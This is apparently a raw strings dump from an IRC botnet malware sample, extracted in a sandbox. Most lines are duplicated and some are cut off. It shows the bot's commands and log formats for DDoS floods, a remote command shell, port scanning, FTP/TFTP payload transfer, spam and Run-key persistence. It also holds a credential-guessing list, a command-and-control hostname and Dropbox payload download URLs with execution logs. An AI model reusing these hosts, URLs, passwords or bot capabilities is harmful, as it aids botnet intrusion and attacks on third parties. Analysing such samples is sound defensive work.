[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: Couldn't open file: %s.
[DOWNLOAD]: Couldn't open file: %s.
[IDENTD]: Error: server failed, returned: <%d>.
[IDENTD]: Error: server failed, returned: <%d>.
: USERID : UNIX : %s
: USERID : UNIX : %s
[IDENTD]: Client connection from IP: %s:%d.
[IDENTD]: Client connection from IP: %s:%d.
%s %s :%s
%s %s :%s
PRIVMSG
PRIVMSG
avicap32.dll
avicap32.dll
SQLDisconnect
SQLDisconnect
SQLFreeHandle
SQLFreeHandle
SQLAllocHandle
SQLAllocHandle
SQLExecDirect
SQLExecDirect
SQLSetEnvAttr
SQLSetEnvAttr
SQLDriverConnect
SQLDriverConnect
odbc32.dll
odbc32.dll
ShellExecuteA
ShellExecuteA
shell32.dll
shell32.dll
mpr.dll
mpr.dll
iphlpapi.dll
iphlpapi.dll
dnsapi.dll
dnsapi.dll
netapi32.dll
netapi32.dll
icmp.dll
icmp.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetCrackUrlA
InternetOpenUrlA
InternetOpenUrlA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
wininet.dll
wininet.dll
ws2_32.dll
ws2_32.dll
gdi32.dll
gdi32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
advapi32.dll
advapi32.dll
ExitWindowsEx
ExitWindowsEx
user32.dll
user32.dll
kernel32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
Kernel32.dll failed. <%d>
videos.p0rn-lover.us
videos.p0rn-lover.us
support.exe
support.exe
Supports RAS Connections
Supports RAS Connections
g.dat
g.dat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
Software\Microsoft\Windows\CurrentVersion\RunServices
winpass
winpass
sqlpassoainstall
sqlpassoainstall
databasepassword
databasepassword
databasepass
databasepass
dbpassword
dbpassword
dbpass
dbpass
domainpassword
domainpassword
domainpass
domainpass
loginpass
loginpass
login
login
windows
windows
1234567890
1234567890
123456789
123456789
12345678
12345678
1234567
1234567
pass1234
pass1234
passwd
passwd
password
password
password1
password1
*@fbi.edu
*@fbi.edu
Ý %dh %dm
Ý %dh %dm
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[IDENTD]: Failed to start server, error: <%d>.
[IDENTD]: Failed to start server, error: <%d>.
[IDENTD]: Server running on Port: 113.
[IDENTD]: Server running on Port: 113.
%s %d "%s"
%s %d "%s"
%s\%s
%s\%s
[MAIN]: Connected to %s.
[MAIN]: Connected to %s.
NICK %s
NICK %s
USER %s 0 0 :%s
USER %s 0 0 :%s
PASS %s
PASS %s
MODE %s %s
MODE %s %s
USERHOST %s
USERHOST %s
[MAIN]: User: %s logged in.
[MAIN]: User: %s logged in.
[MAIN]: Password accepted.
[MAIN]: Password accepted.
[MAIN]: *Failed host auth by: (%s!%s).
[MAIN]: *Failed host auth by: (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
[MAIN]: *Failed pass auth by: (%s!%s).
[MAIN]: *Failed pass auth by: (%s!%s).
NOTICE %s :Your attempt has been logged.
NOTICE %s :Your attempt has been logged.
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s :Pass auth failed (%s!%s).
[MAIN]: Random nick change: %s
[MAIN]: Random nick change: %s
[FTP]: Uploading file: %s to: %s failed.
[FTP]: Uploading file: %s to: %s failed.
[FTP]: Uploading file: %s to: %s
[FTP]: Uploading file: %s to: %s
ftp.exe
ftp.exe
-s:%s
-s:%s
open %s
open %s
put %s
put %s
%s\%i%i%i.dll
%s\%i%i%i.dll
[FTP]: File not found: %s.
[FTP]: File not found: %s.
[MAIN]: Invalid login slot number: %d.
[MAIN]: Invalid login slot number: %d.
[MAIN]: No user logged in at slot: %d.
[MAIN]: No user logged in at slot: %d.
[MAIN]: %s
[MAIN]: %s
QUIT :%s
QUIT :%s
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Bot ID: %s.
[MAIN]: Bot ID: %s.
[THREADS]: Failed to start list thread, error: <%d>.
[THREADS]: Failed to start list thread, error: <%d>.
[MAIN]: Uptime: %s.
[MAIN]: Uptime: %s.
[CMD]: Remote shell ready.
[CMD]: Remote shell ready.
[CMD]: Couldn't open remote shell.
[CMD]: Couldn't open remote shell.
[CMD]: Remote shell already running.
[CMD]: Remote shell already running.
[TFTP]: Failed to start server thread, error: <%d>.
[TFTP]: Failed to start server thread, error: <%d>.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Already running.
[TFTP]: Already running.
[MAIN]: Nick changed to: '%s'.
[MAIN]: Nick changed to: '%s'.
[MAIN]: Joined channel: '%s'.
[MAIN]: Joined channel: '%s'.
[MAIN]: Parted channel: '%s'.
[MAIN]: Parted channel: '%s'.
[MAIN]: IRC Raw: %s.
[MAIN]: IRC Raw: %s.
[THREADS]: Failed to kill thread: %s.
[THREADS]: Failed to kill thread: %s.
[THREADS]: Killed thread: %s.
[THREADS]: Killed thread: %s.
[THREADS]: Stopped: %d thread(s).
[THREADS]: Stopped: %d thread(s).
[MAIN]: Prefix changed to: '%c'.
[MAIN]: Prefix changed to: '%c'.
[SHELL]: Couldn't open file: %s
[SHELL]: Couldn't open file: %s
[SHELL]: File opened: %s
[SHELL]: File opened: %s
[MAIN]: Server changed to: '%s'.
[MAIN]: Server changed to: '%s'.
[DNS]: Lookup: %s -> %s.
[DNS]: Lookup: %s -> %s.
[FILE]: Deleted '%s'.
[FILE]: Deleted '%s'.
[VISIT]: Failed to start connection thread, error: <%d>.
[VISIT]: Failed to start connection thread, error: <%d>.
[VISIT]: URL: %s.
[VISIT]: URL: %s.
[CMD]: Commands: %s
[CMD]: Commands: %s
[CMD]: Error sending to remote shell.
[CMD]: Error sending to remote shell.
[MAIN]: Read file failed: %s
[MAIN]: Read file failed: %s
[MAIN]: Read file complete: %s
[MAIN]: Read file complete: %s
[MAIN]: Gethost: %s.
[MAIN]: Gethost: %s.
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Alias added: %s.
[MAIN]: Alias added: %s.
[MAIN]: Privmsg: %s: %s.
[MAIN]: Privmsg: %s: %s.
[MAIN]: Action: %s: %s.
[MAIN]: Action: %s: %s.
PART %s
PART %s
[MAIN]: Mode change: %s
[MAIN]: Mode change: %s
MODE %s
MODE %s
[CLONE]: Raw (%s): %s
[CLONE]: Raw (%s): %s
[CLONE]: Mode (%s): %s
[CLONE]: Mode (%s): %s
[CLONE]: Nick (%s): %s
[CLONE]: Nick (%s): %s
JOIN %s %s
JOIN %s %s
[MAIN]: Repeat not allowed in command line: %s
[MAIN]: Repeat not allowed in command line: %s
[MAIN]: Repeat: %s
[MAIN]: Repeat: %s
%s %s %s :%s
%s %s %s :%s
[UPDATE]: Failed to start download thread, error: <%d>.
[UPDATE]: Failed to start download thread, error: <%d>.
[UPDATE]: Downloading update from: %s.
[UPDATE]: Downloading update from: %s.
%s%s.exe
%s%s.exe
[EXEC]: Commands: %s
[EXEC]: Commands: %s
[EXEC]: Couldn't execute file.
[EXEC]: Couldn't execute file.
[CLONES]: Failed to start clone thread, error: <%d>.
[CLONES]: Failed to start clone thread, error: <%d>.
[CLONES]: Created on %s:%d, in channel %s.
[CLONES]: Created on %s:%d, in channel %s.
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DOWNLOAD]: Failed to start transfer thread, error: <%d>.
[DOWNLOAD]: Failed to start transfer thread, error: <%d>.
[DOWNLOAD]: Downloading URL: %s to: %s.
[DOWNLOAD]: Downloading URL: %s to: %s.
[REDIRECT]: Failed to start redirection thread, error: <%d>.
[REDIRECT]: Failed to start redirection thread, error: <%d>.
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[SCAN]: Failed to start scan thread, error: <%d>.
[SCAN]: Failed to start scan thread, error: <%d>.
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
[%s] <%s> %s
[%s] <%s> %s
[%s] * %s %s
[%s] * %s %s
ACTION %s
ACTION %s
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[EMAIL]: Message sent to %s.
[EMAIL]: Message sent to %s.
helo $rndnick
helo $rndnick
mail from: <%s>
mail from: <%s>
rcpt to: <%s>
rcpt to: <%s>
subject: %s
subject: %s
from: %s
from: %s
udpflood
udpflood
c_privmsg
c_privmsg
. Failed to start flood thread, error: <%d>.
. Failed to start flood thread, error: <%d>.
. Flooding: (%s:%s) for %s seconds.
. Flooding: (%s:%s) for %s seconds.
ddos.supersyn
ddos.supersyn
c_join
c_join
c_nick
c_nick
privmsg
privmsg
[IDENT]: Server stopped. (%d thread(s) stopped.)
[IDENT]: Server stopped. (%d thread(s) stopped.)
mirccmd
mirccmd
c_rndnick
c_rndnick
join
join
nick
nick
tftp
tftp
tftpserver
tftpserver
[MAIN]: Login list complete.
[MAIN]: Login list complete.
%d. %s
%d. %s
-[Login List]-
-[Login List]-
[CMD]
[CMD]
cmdstop
cmdstop
ocmd
ocmd
opencmd
opencmd
[TFTP]
[TFTP]
tftpstop
tftpstop
supersyn.stop
supersyn.stop
TCP redirect
TCP redirect
rndnick
rndnick
$rndnick
$rndnick
NOTICE %s :
NOTICE %s :
PING %s
PING %s
VERSION %s
VERSION %s
[MAIN]: Joined channel: %s.
[MAIN]: Joined channel: %s.
[MAIN]: User: %s logged out.
[MAIN]: User: %s logged out.
:%s%s
:%s%s
NICK
NICK
NOTICE %s :%s
NOTICE %s :%s
[MAIN]: User %s logged out.
[MAIN]: User %s logged out.
PONG %s
PONG %s
%s Error: %s <%d>.
%s Error: %s <%d>.
explorer.exe
explorer.exe
%%comspec%% /c %s %s
%%comspec%% /c %s %s
del "%s"
del "%s"
%sdel.bat
%sdel.bat
%d.%d.%d.%d
%d.%d.%d.%d
[PING]: Finished sending pings to %s.
[PING]: Finished sending pings to %s.
[PING]: Error sending pings to %s.
[PING]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Finished sending packets to %s.
[UDP]: Error sending pings to %s.
[UDP]: Error sending pings to %s.
[REDIRECT]: Failed to start client thread, error: <%d>.
[REDIRECT]: Failed to start client thread, error: <%d>.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start connection thread, error: <%d>.
[REDIRECT]: Failed to start connection thread, error: <%d>.
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
PRIVMSG %s :%s
PRIVMSG %s :%s
[CMD]: Could not read data from proccess.
[CMD]: Could not read data from proccess.
[CMD]: Proccess has terminated.
[CMD]: Proccess has terminated.
[CMD]: Could not read data from proccess
[CMD]: Could not read data from proccess
[CMD]: Failed to start IO thread, error: <%d>.
[CMD]: Failed to start IO thread, error: <%d>.
[CMD]: Remote Command Prompt
[CMD]: Remote Command Prompt
cmd.exe
cmd.exe
[%s]|
[%s]|
[%d]%s
[%d]%s
[SCAN]: IP: %s Port: %d is open.
[SCAN]: IP: %s Port: %d is open.
[SCAN]: Scanning IP: %s, Port: %d.
[SCAN]: Scanning IP: %s, Port: %d.
tftp.exe -i get
tftp.exe -i get
IP: %s
IP: %s
[TFTP]: Failed to open file: %s.
[TFTP]: Failed to open file: %s.
[TFTP]: Error: socket() failed, returned: <%d>.
[TFTP]: Error: socket() failed, returned: <%d>.
%s: No %s thread found.
%s: No %s thread found.
%s: %s stopped. (%d thread(s) stopped.)
%s: %s stopped. (%d thread(s) stopped.)
[VISIT]: Failed to connect to HTTP server.
[VISIT]: Failed to connect to HTTP server.
[VISIT]: Invalid URL.
[VISIT]: Invalid URL.
[VISIT]: Failed to get requested URL from HTTP server.
[VISIT]: Failed to get requested URL from HTTP server.
[VISIT]: URL visited.
[VISIT]: URL visited.
zcÁ
zcÁ
[07-30-2014 01:50:55] [DOWNLOAD]: Opened: C:/windows/systemj.exe.
[07-30-2014 01:50:55] [DOWNLOAD]: Opened: C:/windows/systemj.exe.
s/systemj.exe @ 195.8 KB/sec.
s/systemj.exe @ 195.8 KB/sec.
exe?dl=1 to: C:/windows/system.e[07-30-2014 01:50:54] [DOWNLOAD]: Opened: C:/windows/system.exe.
exe?dl=1 to: C:/windows/system.e[07-30-2014 01:50:54] [DOWNLOAD]: Opened: C:/windows/system.exe.
[07-30-2014 01:50:54] [DOWNLOAD]: Downloaded 587.5 KB to C:/windows/systemj.exe @ 195.8 KB/sec.
[07-30-2014 01:50:54] [DOWNLOAD]: Downloaded 587.5 KB to C:/windows/systemj.exe @ 195.8 KB/sec.
[07-30-2014 01:50:53] [DOWNLOAD]: Downloaded 482.3 KB to C:/windows/system.exe @ 241.2 KB/sec.
[07-30-2014 01:50:53] [DOWNLOAD]: Downloaded 482.3 KB to C:/windows/system.exe @ 241.2 KB/sec.
[07-30-2014 01:50:46] [MAIN]: Joined channel: #fkyou#.
[07-30-2014 01:50:46] [MAIN]: Joined channel: #fkyou#.
[07-30-2014 01:50:46] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 to: C:/windows/system.
[07-30-2014 01:50:46] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 to: C:/windows/system.
[07-30-2014 01:50:45] [MAIN]: Joined channel: #Security-Check.
[07-30-2014 01:50:45] [MAIN]: Joined channel: #Security-Check.
[07-30-2014 01:50:45] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 to: C:/windows/systemj
[07-30-2014 01:50:45] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 to: C:/windows/systemj
[07-30-2014 01:50:45] [MAIN]: Connected to videos.p0rn-lover.us.
[07-30-2014 01:50:45] [MAIN]: Connected to videos.p0rn-lover.us.
[07-30-2014 01:50:44] [IDENTD]: Server running on Port: 113.
[07-30-2014 01:50:44] [IDENTD]: Server running on Port: 113.
DOWNLOAD]: File download: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 (587KB transferred).
DOWNLOAD]: File download: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 (587KB transferred).
emj.exe.
emj.exe.
DOWNLOAD]: File download: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 (482KB transferred).
DOWNLOAD]: File download: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 (482KB transferred).
em.exe.
em.exe.
%System%\pwyqire.exe
%System%\pwyqire.exe
19584375
19584375
000000009
000000009
pwyqire.exe_500_rwx_00400000_0009C000:
.text
.text
`.rdata
`.rdata
@.data
@.data
_WSSh
_WSSh
t1SSSSh
t1SSSSh
PeekNamedPipe
PeekNamedPipe
CreatePipe
CreatePipe
KERNEL32.dll
KERNEL32.dll
WS2_32.dll
WS2_32.dll
GetCPInfo
GetCPInfo
%d. %s = %s
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[DDoS]: Send error: <%d>.
[DDoS]: Send error: <%d>.
ddos.random
ddos.random
ddos.ack
ddos.ack
ddos.syn
ddos.syn
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[UPDATE]: Update failed: Error executing file: %s.
[UPDATE]: Update failed: Error executing file: %s.
[UPDATE]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[UPDATE]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: Couldn't open file: %s.
[DOWNLOAD]: Couldn't open file: %s.
[IDENTD]: Error: server failed, returned: <%d>.
[IDENTD]: Error: server failed, returned: <%d>.
: USERID : UNIX : %s
: USERID : UNIX : %s
[IDENTD]: Client connection from IP: %s:%d.
[IDENTD]: Client connection from IP: %s:%d.
%s %s :%s
%s %s :%s
PRIVMSG
PRIVMSG
avicap32.dll
avicap32.dll
SQLDisconnect
SQLDisconnect
SQLFreeHandle
SQLFreeHandle
SQLAllocHandle
SQLAllocHandle
SQLExecDirect
SQLExecDirect
SQLSetEnvAttr
SQLSetEnvAttr
SQLDriverConnect
SQLDriverConnect
odbc32.dll
odbc32.dll
ShellExecuteA
ShellExecuteA
shell32.dll
shell32.dll
mpr.dll
mpr.dll
iphlpapi.dll
iphlpapi.dll
dnsapi.dll
dnsapi.dll
netapi32.dll
netapi32.dll
icmp.dll
icmp.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetCrackUrlA
InternetOpenUrlA
InternetOpenUrlA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
wininet.dll
wininet.dll
ws2_32.dll
ws2_32.dll
gdi32.dll
gdi32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
advapi32.dll
advapi32.dll
ExitWindowsEx
ExitWindowsEx
user32.dll
user32.dll
kernel32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
Kernel32.dll failed. <%d>
videos.p0rn-lover.us
videos.p0rn-lover.us
support.exe
support.exe
Supports RAS Connections
Supports RAS Connections
g.dat
g.dat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
Software\Microsoft\Windows\CurrentVersion\RunServices
winpass
winpass
sqlpassoainstall
sqlpassoainstall
databasepassword
databasepassword
databasepass
databasepass
dbpassword
dbpassword
dbpass
dbpass
domainpassword
domainpassword
domainpass
domainpass
loginpass
loginpass
login
login
windows
windows
1234567890
1234567890
123456789
123456789
12345678
12345678
1234567
1234567
pass1234
pass1234
passwd
passwd
password
password
password1
password1
*@fbi.edu
*@fbi.edu
Ý %dh %dm
Ý %dh %dm
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[IDENTD]: Failed to start server, error: <%d>.
[IDENTD]: Failed to start server, error: <%d>.
[IDENTD]: Server running on Port: 113.
[IDENTD]: Server running on Port: 113.
%s %d "%s"
%s %d "%s"
%s\%s
%s\%s
[MAIN]: Connected to %s.
[MAIN]: Connected to %s.
NICK %s
NICK %s
USER %s 0 0 :%s
USER %s 0 0 :%s
PASS %s
PASS %s
MODE %s %s
MODE %s %s
USERHOST %s
USERHOST %s
[MAIN]: User: %s logged in.
[MAIN]: User: %s logged in.
[MAIN]: Password accepted.
[MAIN]: Password accepted.
[MAIN]: *Failed host auth by: (%s!%s).
[MAIN]: *Failed host auth by: (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
[MAIN]: *Failed pass auth by: (%s!%s).
[MAIN]: *Failed pass auth by: (%s!%s).
NOTICE %s :Your attempt has been logged.
NOTICE %s :Your attempt has been logged.
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s :Pass auth failed (%s!%s).
[MAIN]: Random nick change: %s
[MAIN]: Random nick change: %s
[FTP]: Uploading file: %s to: %s failed.
[FTP]: Uploading file: %s to: %s failed.
[FTP]: Uploading file: %s to: %s
[FTP]: Uploading file: %s to: %s
ftp.exe
ftp.exe
-s:%s
-s:%s
open %s
open %s
put %s
put %s
%s\%i%i%i.dll
%s\%i%i%i.dll
[FTP]: File not found: %s.
[FTP]: File not found: %s.
[MAIN]: Invalid login slot number: %d.
[MAIN]: Invalid login slot number: %d.
[MAIN]: No user logged in at slot: %d.
[MAIN]: No user logged in at slot: %d.
[MAIN]: %s
[MAIN]: %s
QUIT :%s
QUIT :%s
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Bot ID: %s.
[MAIN]: Bot ID: %s.
[THREADS]: Failed to start list thread, error: <%d>.
[THREADS]: Failed to start list thread, error: <%d>.
[MAIN]: Uptime: %s.
[MAIN]: Uptime: %s.
[CMD]: Remote shell ready.
[CMD]: Remote shell ready.
[CMD]: Couldn't open remote shell.
[CMD]: Couldn't open remote shell.
[CMD]: Remote shell already running.
[CMD]: Remote shell already running.
[TFTP]: Failed to start server thread, error: <%d>.
[TFTP]: Failed to start server thread, error: <%d>.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Already running.
[TFTP]: Already running.
[MAIN]: Nick changed to: '%s'.
[MAIN]: Nick changed to: '%s'.
[MAIN]: Joined channel: '%s'.
[MAIN]: Joined channel: '%s'.
[MAIN]: Parted channel: '%s'.
[MAIN]: Parted channel: '%s'.
[MAIN]: IRC Raw: %s.
[MAIN]: IRC Raw: %s.
[THREADS]: Failed to kill thread: %s.
[THREADS]: Failed to kill thread: %s.
[THREADS]: Killed thread: %s.
[THREADS]: Killed thread: %s.
[THREADS]: Stopped: %d thread(s).
[THREADS]: Stopped: %d thread(s).
[MAIN]: Prefix changed to: '%c'.
[MAIN]: Prefix changed to: '%c'.
[SHELL]: Couldn't open file: %s
[SHELL]: Couldn't open file: %s
[SHELL]: File opened: %s
[SHELL]: File opened: %s
[MAIN]: Server changed to: '%s'.
[MAIN]: Server changed to: '%s'.
[DNS]: Lookup: %s -> %s.
[DNS]: Lookup: %s -> %s.
[FILE]: Deleted '%s'.
[FILE]: Deleted '%s'.
[VISIT]: Failed to start connection thread, error: <%d>.
[VISIT]: Failed to start connection thread, error: <%d>.
[VISIT]: URL: %s.
[VISIT]: URL: %s.
[CMD]: Commands: %s
[CMD]: Commands: %s
[CMD]: Error sending to remote shell.
[CMD]: Error sending to remote shell.
[MAIN]: Read file failed: %s
[MAIN]: Read file failed: %s
[MAIN]: Read file complete: %s
[MAIN]: Read file complete: %s
[MAIN]: Gethost: %s.
[MAIN]: Gethost: %s.
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Alias added: %s.
[MAIN]: Alias added: %s.
[MAIN]: Privmsg: %s: %s.
[MAIN]: Privmsg: %s: %s.
[MAIN]: Action: %s: %s.
[MAIN]: Action: %s: %s.
PART %s
PART %s
[MAIN]: Mode change: %s
[MAIN]: Mode change: %s
MODE %s
MODE %s
[CLONE]: Raw (%s): %s
[CLONE]: Raw (%s): %s
[CLONE]: Mode (%s): %s
[CLONE]: Mode (%s): %s
[CLONE]: Nick (%s): %s
[CLONE]: Nick (%s): %s
JOIN %s %s
JOIN %s %s
[MAIN]: Repeat not allowed in command line: %s
[MAIN]: Repeat not allowed in command line: %s
[MAIN]: Repeat: %s
[MAIN]: Repeat: %s
%s %s %s :%s
%s %s %s :%s
[UPDATE]: Failed to start download thread, error: <%d>.
[UPDATE]: Failed to start download thread, error: <%d>.
[UPDATE]: Downloading update from: %s.
[UPDATE]: Downloading update from: %s.
%s%s.exe
%s%s.exe
[EXEC]: Commands: %s
[EXEC]: Commands: %s
[EXEC]: Couldn't execute file.
[EXEC]: Couldn't execute file.
[CLONES]: Failed to start clone thread, error: <%d>.
[CLONES]: Failed to start clone thread, error: <%d>.
[CLONES]: Created on %s:%d, in channel %s.
[CLONES]: Created on %s:%d, in channel %s.
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DOWNLOAD]: Failed to start transfer thread, error: <%d>.
[DOWNLOAD]: Failed to start transfer thread, error: <%d>.
[DOWNLOAD]: Downloading URL: %s to: %s.
[DOWNLOAD]: Downloading URL: %s to: %s.
[REDIRECT]: Failed to start redirection thread, error: <%d>.
[REDIRECT]: Failed to start redirection thread, error: <%d>.
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[SCAN]: Failed to start scan thread, error: <%d>.
[SCAN]: Failed to start scan thread, error: <%d>.
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
[%s] <%s> %s
[%s] <%s> %s
[%s] * %s %s
[%s] * %s %s
ACTION %s
ACTION %s
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[EMAIL]: Message sent to %s.
[EMAIL]: Message sent to %s.
helo $rndnick
helo $rndnick
mail from: <%s>
mail from: <%s>
rcpt to: <%s>
rcpt to: <%s>
subject: %s
subject: %s
from: %s
from: %s
udpflood
udpflood
c_privmsg
c_privmsg
. Failed to start flood thread, error: <%d>.
. Failed to start flood thread, error: <%d>.
. Flooding: (%s:%s) for %s seconds.
. Flooding: (%s:%s) for %s seconds.
ddos.supersyn
ddos.supersyn
c_join
c_join
c_nick
c_nick
privmsg
privmsg
[IDENT]: Server stopped. (%d thread(s) stopped.)
[IDENT]: Server stopped. (%d thread(s) stopped.)
mirccmd
mirccmd
c_rndnick
c_rndnick
join
join
nick
nick
tftp
tftp
tftpserver
tftpserver
[MAIN]: Login list complete.
[MAIN]: Login list complete.
%d. %s
%d. %s
-[Login List]-
-[Login List]-
[CMD]
[CMD]
cmdstop
cmdstop
ocmd
ocmd
opencmd
opencmd
[TFTP]
[TFTP]
tftpstop
tftpstop
supersyn.stop
supersyn.stop
TCP redirect
TCP redirect
rndnick
rndnick
$rndnick
$rndnick
NOTICE %s :
NOTICE %s :
PING %s
PING %s
VERSION %s
VERSION %s
[MAIN]: Joined channel: %s.
[MAIN]: Joined channel: %s.
[MAIN]: User: %s logged out.
[MAIN]: User: %s logged out.
:%s%s
:%s%s
NICK
NICK
NOTICE %s :%s
